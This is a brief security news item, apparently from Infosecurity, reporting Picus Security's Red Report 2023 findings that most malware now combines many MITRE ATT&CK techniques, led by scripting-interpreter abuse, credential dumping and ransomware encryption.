"Experts Warn of Surge in Multipurpose Malware"

Security researchers at Picus Security have warned that a growing number of versatile malware variants are capable of performing multiple malicious actions across the cyber-kill chain.  Picus Security compiled its Red Report 2023 by analyzing over 500,000 malware samples last year, identifying their tactics, techniques, and procedures (TTPs), and extracting over 5.3 million "actions." The vendor then mapped these actions to MITRE ATT&CK techniques.  The researchers found that the average malware variant now leverages 11 TTPs or nine MITRE ATT&CK techniques.  One-third (32%) uses more than 20 TTPs, and one in 10 leverages over 30 TTPs.  The researchers noted that this "Swiss Army knife" malware can enable attackers to move through networks undetected at great speed, obtain credentials to access critical systems, and encrypt data.  The researchers found that 40% of the most prevalent MITRE ATT&CK techniques they identified were used to help with lateral movement.  These included tried-and-tested techniques such as Command and Scripting Interpreter and OS Credential Dumping and newer ones such as Remote Services, Remote System Discovery, and WMI.  The researchers noted that the most common technique used was Command and Scripting Interpreter, which involves the abuse of legitimate interpreters such as PowerShell, AppleScript, and Unix shells to execute arbitrary commands.  The researchers stated that this highlights how hackers favor legitimate existing tools in their attacks rather than custom-developed ones.  The second most common technique used was OS Credential Dumping, which attackers use to hijack accounts and move laterally.  Third, came Data Encrypted for Impact, which reveals the continued threat posed by ransomware.

Infosecurity reports: "Experts Warn of Surge in Multipurpose Malware"